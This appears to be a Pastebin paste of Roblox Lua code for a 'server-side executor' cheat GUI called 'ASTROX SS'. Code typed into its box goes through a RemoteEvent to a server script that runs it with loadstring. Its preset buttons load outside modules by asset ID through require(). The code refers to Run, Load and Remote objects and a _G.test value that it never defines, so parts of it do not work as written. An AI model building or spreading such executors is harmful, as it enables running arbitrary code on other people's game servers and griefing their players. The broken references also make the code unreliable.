TCFR17

Untitled

Mar 29th, 2020
50
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 12.40 KB | None | 0 0
  1.  
  2. -- Farewell Infortality.
  3. -- Version: 2.82
  4. -- Instances:
  5. local Executor = Instance.new("ScreenGui")
  6. local Main = Instance.new("Frame")
  7. local ExecGuiV2ShadowLabel = Instance.new("TextLabel")
  8. local Scroll = Instance.new("ScrollingFrame")
  9. local CodeBox = Instance.new("TextBox")
  10. local Execute = Instance.new("TextButton")
  11. local Clear = Instance.new("TextButton")
  12. local HideCodeLabel = Instance.new("TextLabel")
  13. local HideCodeBox = Instance.new("TextButton")
  14. local ExecGuiV2Label = Instance.new("TextLabel")
  15. local Close = Instance.new("TextButton")
  16. local QE = Instance.new("TextButton")
  17. local Quick = Instance.new("Frame")
  18. local Side = Instance.new("Frame")
  19. local Maps = Instance.new("TextButton")
  20. local Titans = Instance.new("TextButton")
  21. local Scripts = Instance.new("TextButton")
  22. local Maps_2 = Instance.new("Frame")
  23. local KFC = Instance.new("TextButton")
  24. --Properties:
  25. Executor.Name = "Executor"
  26. Executor.Parent = game.Players.LocalPlayer:WaitForChild("PlayerGui")
  27. Executor.ResetOnSpawn = false
  28.  
  29. Main.Name = "Main"
  30. Main.Parent = Executor
  31. Main.Active = true
  32. Main.BackgroundColor3 = Color3.new(0.529412, 0.529412, 0.529412)
  33. Main.BorderSizePixel = 0
  34. Main.Position = UDim2.new(0.0214220583, 0, 0.467940927, 0)
  35. Main.Size = UDim2.new(0.376690984, 0, 0.278626025, 0)
  36.  
  37. ExecGuiV2ShadowLabel.Name = "ExecGuiV2ShadowLabel"
  38. ExecGuiV2ShadowLabel.Parent = Main
  39. ExecGuiV2ShadowLabel.BackgroundColor3 = Color3.new(0.27451, 0.27451, 0.27451)
  40. ExecGuiV2ShadowLabel.BorderColor3 = Color3.new(0.666667, 1, 1)
  41. ExecGuiV2ShadowLabel.BorderSizePixel = 0
  42. ExecGuiV2ShadowLabel.Position = UDim2.new(0, 0, 0.127103388, 0)
  43. ExecGuiV2ShadowLabel.Size = UDim2.new(1, 0, 0.076127328, 0)
  44. ExecGuiV2ShadowLabel.Font = Enum.Font.SourceSansLight
  45. ExecGuiV2ShadowLabel.Text = ""
  46. ExecGuiV2ShadowLabel.TextColor3 = Color3.new(1, 1, 1)
  47. ExecGuiV2ShadowLabel.TextScaled = true
  48. ExecGuiV2ShadowLabel.TextSize = 20
  49. ExecGuiV2ShadowLabel.TextWrapped = true
  50.  
  51. Scroll.Name = "Scroll"
  52. Scroll.Parent = Main
  53. Scroll.BackgroundColor3 = Color3.new(0.796079, 0.513726, 0.164706)
  54. Scroll.BackgroundTransparency = 0.69999998807907
  55. Scroll.BorderColor3 = Color3.new(0.27451, 0.596078, 0.686275)
  56. Scroll.BorderSizePixel = 2
  57. Scroll.Position = UDim2.new(0.0166438818, 0, 0.203230724, 0)
  58. Scroll.Size = UDim2.new(0.961256504, 0, 0.638848126, 0)
  59. Scroll.ScrollBarThickness = 5
  60.  
  61. CodeBox.Name = "CodeBox"
  62. CodeBox.Parent = Scroll
  63. CodeBox.BackgroundColor3 = Color3.new(0, 0, 0)
  64. CodeBox.BackgroundTransparency = 1
  65. CodeBox.BorderSizePixel = 0
  66. CodeBox.Position = UDim2.new(0.0158930533, 0, -4.9078443e-07, 0)
  67. CodeBox.Size = UDim2.new(0.957883418, 0, 10.1010714, 0)
  68. CodeBox.ClearTextOnFocus = false
  69. CodeBox.Font = Enum.Font.SourceSansLight
  70. CodeBox.MultiLine = true
  71. CodeBox.PlaceholderColor3 = Color3.new(1, 1, 1)
  72. CodeBox.PlaceholderText = "Require here"
  73. CodeBox.Text = ""
  74. CodeBox.TextColor3 = Color3.new(1, 1, 1)
  75. CodeBox.TextSize = 18
  76. CodeBox.TextWrapped = true
  77. CodeBox.TextXAlignment = Enum.TextXAlignment.Left
  78. CodeBox.TextYAlignment = Enum.TextYAlignment.Top
  79.  
  80. Execute.Name = "Execute"
  81. Execute.Parent = Main
  82. Execute.BackgroundColor3 = Color3.new(0.909804, 0.537255, 0.164706)
  83. Execute.BorderColor3 = Color3.new(0.27451, 0.596078, 0.686275)
  84. Execute.BorderSizePixel = 2
  85. Execute.Position = UDim2.new(0.0166438818, 0, 0.851975858, 0)
  86. Execute.Size = UDim2.new(0.185082927, 0, 0.133825406, 0)
  87. Execute.Font = Enum.Font.SciFi
  88. Execute.Text = "Execute"
  89. Execute.TextColor3 = Color3.new(0.666667, 1, 1)
  90. Execute.TextScaled = true
  91. Execute.TextSize = 18
  92. Execute.TextStrokeColor3 = Color3.new(0.666667, 1, 1)
  93. Execute.TextWrapped = true
  94.  
  95. Clear.Name = "Clear"
  96. Clear.Parent = Main
  97. Clear.BackgroundColor3 = Color3.new(0.909804, 0.537255, 0.164706)
  98. Clear.BorderColor3 = Color3.new(0.27451, 0.596078, 0.686275)
  99. Clear.BorderSizePixel = 2
  100. Clear.Position = UDim2.new(0.229436591, 0, 0.858825207, 0)
  101. Clear.Size = UDim2.new(0.157458708, 0, 0.120126776, 0)
  102. Clear.Font = Enum.Font.SciFi
  103. Clear.Text = "Clear"
  104. Clear.TextColor3 = Color3.new(0.666667, 1, 1)
  105. Clear.TextScaled = true
  106. Clear.TextSize = 18
  107. Clear.TextWrapped = true
  108.  
  109. HideCodeLabel.Name = "HideCodeLabel"
  110. HideCodeLabel.Parent = Main
  111. HideCodeLabel.BackgroundColor3 = Color3.new(0.0156863, 0.0156863, 0.0156863)
  112. HideCodeLabel.BackgroundTransparency = 1
  113. HideCodeLabel.BorderColor3 = Color3.new(0, 0, 0)
  114. HideCodeLabel.BorderSizePixel = 0
  115. HideCodeLabel.Position = UDim2.new(0.748303592, 0, 0.842078984, 0)
  116. HideCodeLabel.Size = UDim2.new(0.168823421, 0, 0.157920912, 0)
  117. HideCodeLabel.Font = Enum.Font.SciFi
  118. HideCodeLabel.Text = "Hide Require"
  119. HideCodeLabel.TextColor3 = Color3.new(0, 0, 0)
  120. HideCodeLabel.TextScaled = true
  121. HideCodeLabel.TextSize = 18
  122. HideCodeLabel.TextStrokeColor3 = Color3.new(0.666667, 1, 1)
  123. HideCodeLabel.TextWrapped = true
  124.  
  125. HideCodeBox.Name = "HideCodeBox"
  126. HideCodeBox.Parent = Main
  127. HideCodeBox.BackgroundColor3 = Color3.new(0.909804, 0.537255, 0.164706)
  128. HideCodeBox.BorderColor3 = Color3.new(0.380392, 0.552941, 0.827451)
  129. HideCodeBox.BorderSizePixel = 3
  130. HideCodeBox.Position = UDim2.new(0.942754149, 0, 0.851975858, 0)
  131. HideCodeBox.Size = UDim2.new(0.0517208874, 0, 0.126976073, 0)
  132. HideCodeBox.Font = Enum.Font.SourceSansLight
  133. HideCodeBox.Text = ""
  134. HideCodeBox.TextColor3 = Color3.new(0.666667, 1, 1)
  135. HideCodeBox.TextScaled = true
  136. HideCodeBox.TextSize = 14
  137. HideCodeBox.TextWrapped = true
  138.  
  139. ExecGuiV2Label.Name = "ExecGuiV2Label"
  140. ExecGuiV2Label.Parent = Main
  141. ExecGuiV2Label.Active = true
  142. ExecGuiV2Label.BackgroundColor3 = Color3.new(0.443137, 0.443137, 0.443137)
  143. ExecGuiV2Label.BorderSizePixel = 0
  144. ExecGuiV2Label.Position = UDim2.new(0, 0, 1.04512232e-07, 0)
  145. ExecGuiV2Label.Size = UDim2.new(0.999999821, 0, 0.127103299, 0)
  146. ExecGuiV2Label.Font = Enum.Font.GothamSemibold
  147. ExecGuiV2Label.Text = "ASTROX SS"
  148. ExecGuiV2Label.TextColor3 = Color3.new(1, 1, 1)
  149. ExecGuiV2Label.TextScaled = true
  150. ExecGuiV2Label.TextSize = 20
  151. ExecGuiV2Label.TextWrapped = true
  152.  
  153. Close.Name = "Close"
  154. Close.Parent = Main
  155. Close.BackgroundColor3 = Color3.new(0.658824, 0.423529, 0.458824)
  156. Close.BackgroundTransparency = 1
  157. Close.BorderSizePixel = 0
  158. Close.Position = UDim2.new(0.941988945, 0, -0.00684905052, 0)
  159. Close.Size = UDim2.new(0, 19, 0, 19)
  160. Close.Font = Enum.Font.SciFi
  161. Close.Text = "X"
  162. Close.TextColor3 = Color3.new(1, 1, 1)
  163. Close.TextScaled = true
  164. Close.TextSize = 14
  165. Close.TextWrapped = true
  166.  
  167. QE.Name = "QE"
  168. QE.Parent = Main
  169. QE.BackgroundColor3 = Color3.new(0.658824, 0.423529, 0.458824)
  170. QE.BackgroundTransparency = 1
  171. QE.BorderSizePixel = 0
  172. QE.Position = UDim2.new(0.0165746808, 0, -0.00684905052, 0)
  173. QE.Size = UDim2.new(0, 19, 0, 19)
  174. QE.Font = Enum.Font.SciFi
  175. QE.Text = "QE"
  176. QE.TextColor3 = Color3.new(1, 1, 1)
  177. QE.TextScaled = true
  178. QE.TextSize = 14
  179. QE.TextWrapped = true
  180.  
  181. Quick.Name = "Quick"
  182. Quick.Parent = Executor
  183. Quick.Active = true
  184. Quick.BackgroundColor3 = Color3.new(0.529412, 0.529412, 0.529412)
  185. Quick.Position = UDim2.new(0.0208116621, 0, 0.211832061, 0)
  186. Quick.Size = UDim2.new(0.301768959, 0, 0.23854959, 0)
  187.  
  188. Side.Name = "Side"
  189. Side.Parent = Quick
  190. Side.Active = true
  191. Side.BackgroundColor3 = Color3.new(0.529412, 0.529412, 0.529412)
  192. Side.Position = UDim2.new(0.996321976, 0, 0, 0)
  193. Side.Size = UDim2.new(0.254942745, 0, 0.999999702, 0)
  194.  
  195. Maps.Name = "Maps"
  196. Maps.Parent = Side
  197. Maps.BackgroundColor3 = Color3.new(0.909804, 0.537255, 0.164706)
  198. Maps.BorderColor3 = Color3.new(0.27451, 0.596078, 0.686275)
  199. Maps.BorderSizePixel = 0
  200. Maps.Position = UDim2.new(0.0550042503, 0, 0.048000019, 0)
  201. Maps.Size = UDim2.new(0.873578489, 0, 0.17095162, 0)
  202. Maps.Font = Enum.Font.SciFi
  203. Maps.Text = "Maps"
  204. Maps.TextColor3 = Color3.new(0.666667, 1, 1)
  205. Maps.TextScaled = true
  206. Maps.TextSize = 18
  207. Maps.TextWrapped = true
  208.  
  209. Titans.Name = "Titans"
  210. Titans.Parent = Side
  211. Titans.BackgroundColor3 = Color3.new(0.909804, 0.537255, 0.164706)
  212. Titans.BorderColor3 = Color3.new(0.27451, 0.596078, 0.686275)
  213. Titans.BorderSizePixel = 0
  214. Titans.Position = UDim2.new(0.0550042503, 0, 0.288000107, 0)
  215. Titans.Size = UDim2.new(0.873578489, 0, 0.17095162, 0)
  216. Titans.Font = Enum.Font.SciFi
  217. Titans.Text = "Chars"
  218. Titans.TextColor3 = Color3.new(0.666667, 1, 1)
  219. Titans.TextScaled = true
  220. Titans.TextSize = 18
  221. Titans.TextWrapped = true
  222.  
  223. Scripts.Name = "Scripts"
  224. Scripts.Parent = Side
  225. Scripts.BackgroundColor3 = Color3.new(0.909804, 0.537255, 0.164706)
  226. Scripts.BorderColor3 = Color3.new(0.27451, 0.596078, 0.686275)
  227. Scripts.BorderSizePixel = 0
  228. Scripts.Position = UDim2.new(0.0550042503, 0, 0.528000236, 0)
  229. Scripts.Size = UDim2.new(0.873578489, 0, 0.17095162, 0)
  230. Scripts.Font = Enum.Font.SciFi
  231. Scripts.Text = "Scripts"
  232. Scripts.TextColor3 = Color3.new(0.666667, 1, 1)
  233. Scripts.TextScaled = true
  234. Scripts.TextSize = 18
  235. Scripts.TextWrapped = true
  236.  
  237. Maps_2.Name = "Maps"
  238. Maps_2.Parent = Quick
  239. Maps_2.Active = true
  240. Maps_2.BackgroundColor3 = Color3.new(0.317647, 0.317647, 0.317647)
  241. Maps_2.BackgroundTransparency = 0.30000001192093
  242. Maps_2.Position = UDim2.new(0.0208116751, 0, 0.0480001271, 0)
  243. Maps_2.Size = UDim2.new(0.939700127, 0, 0.887999833, 0)
  244.  
  245. KFC.Name = "KFC"
  246. KFC.Parent = Maps_2
  247. KFC.BackgroundColor3 = Color3.new(0.909804, 0.537255, 0.164706)
  248. KFC.BorderColor3 = Color3.new(0.27451, 0.596078, 0.686275)
  249. KFC.BorderSizePixel = 0
  250. KFC.Position = UDim2.new(0.0256478339, 0, 0.0570090525, 0)
  251. KFC.Size = UDim2.new(0.19297035, 0, 0.33311379, 0)
  252. KFC.Font = Enum.Font.SciFi
  253. KFC.Text = "KFC"
  254. KFC.TextColor3 = Color3.new(0.666667, 1, 1)
  255. KFC.TextScaled = true
  256. KFC.TextSize = 18
  257. KFC.TextWrapped = true
  258. -- Scripts:
  259. function SCRIPT_OMUC66_FAKESCRIPT() -- Main.Handle
  260. local script = Instance.new('LocalScript')
  261. script.Parent = Main
  262. local Hiding = false
  263. local close = false
  264. script.Parent.Draggable = true
  265. script.Parent.Close.MouseButton1Down:Connect(function()
  266. if close == false then
  267. close = true
  268. script.Parent.Clear.Visible = false
  269. script.Parent.Execute.Visible = false
  270. script.Parent.HideCodeBox.Visible = false
  271. script.Parent.HideCodeLabel.Visible = false
  272. script.Parent.Scroll.Visible = false
  273. script.Parent.ExecGuiV2ShadowLabel.Visible = false
  274. script.Parent.BackgroundTransparency = 1
  275. script.Parent.Close.Text = "-"
  276. else
  277. close = false
  278. script.Parent.Clear.Visible = true
  279. script.Parent.Execute.Visible = true
  280. script.Parent.HideCodeBox.Visible = true
  281. script.Parent.HideCodeLabel.Visible = true
  282. script.Parent.Scroll.Visible = true
  283. script.Parent.ExecGuiV2ShadowLabel.Visible = true
  284. script.Parent.BackgroundTransparency = 0
  285. script.Parent.Close.Text = "+"
  286. end
  287.  
  288. end)
  289. script.Parent.Execute.MouseButton1Down:Connect(function()
  290. script.Parent.Parent.Remote:FireServer(script.Parent.Scroll.CodeBox.Text)
  291. end)
  292. script.Parent.HideCodeBox.MouseButton1Down:Connect(function()
  293. if Hiding == false then
  294. script.Parent.HideCodeBox.BackgroundColor3 = Color3.fromRGB(71, 71, 71)
  295. for i=1,10 do
  296. script.Parent.Scroll.CodeBox.TextTransparency = (i/10)
  297. wait()
  298. end
  299. Hiding = true
  300. elseif Hiding == true then
  301. Hiding = false
  302. script.Parent.HideCodeBox.BackgroundColor3 = Color3.fromRGB(49,49,49)
  303. for i=1,10 do
  304. script.Parent.Scroll.CodeBox.TextTransparency = 1-(i/10)
  305. wait()
  306. end
  307. end
  308. end)
  309. script.Parent.Clear.MouseButton1Down:Connect(function()
  310. script.Parent.Scroll.CodeBox.Text = ""
  311. end)
  312.  
  313. script.Parent.Run.MouseButton1Down:Connect(function()
  314. script.Parent.Parent.Remote:FireServer('require('.. tonumber(script.Parent.Load.Text) ..').load('.. _G.test ..')')
  315. end)
  316.  
  317. local clickshowing = false
  318. script.Parent.QE.MouseButton1Down:Connect(function()
  319. if clickshowing == false then
  320. script.Parent.Parent.Quick.Visible = true
  321. clickshowing = true
  322. else
  323. script.Parent.Parent.Quick.Visible = false
  324. clickshowing = false
  325. end
  326. end)
  327.  
  328. end
  329. coroutine.resume(coroutine.create(SCRIPT_OMUC66_FAKESCRIPT))
  330. function SCRIPT_WSGB90_FAKESCRIPT() -- Executor.RemoteHandle
  331. local script = Instance.new('Script')
  332. script.Parent = Executor
  333. script.Parent.Remote.OnServerEvent:Connect(function(wow,yes)
  334. loadstring=require(script.Loadstring)
  335. loadstring(yes)()
  336. end)
  337.  
  338. end
  339. coroutine.resume(coroutine.create(SCRIPT_WSGB90_FAKESCRIPT))
  340. function SCRIPT_LTPW87_FAKESCRIPT() -- Quick.Handle
  341. local script = Instance.new('LocalScript')
  342. script.Parent = Quick
  343. script.Parent.Draggable = true
  344.  
  345. script.Parent.Side.Maps.MouseButton1Down:Connect(function()
  346. script.Parent.Maps.Visible = true
  347. end)
  348.  
  349. script.Parent.Maps.KFC.MouseButton1Down:Connect((function()
  350. script.Parent.Parent.Remote:FireServer('require(3124362032).load("")')
  351. end))
  352.  
  353. end
  354. coroutine.resume(coroutine.create(SCRIPT_LTPW87_FAKESCRIPT))
Add Comment
Please, Sign In to add comment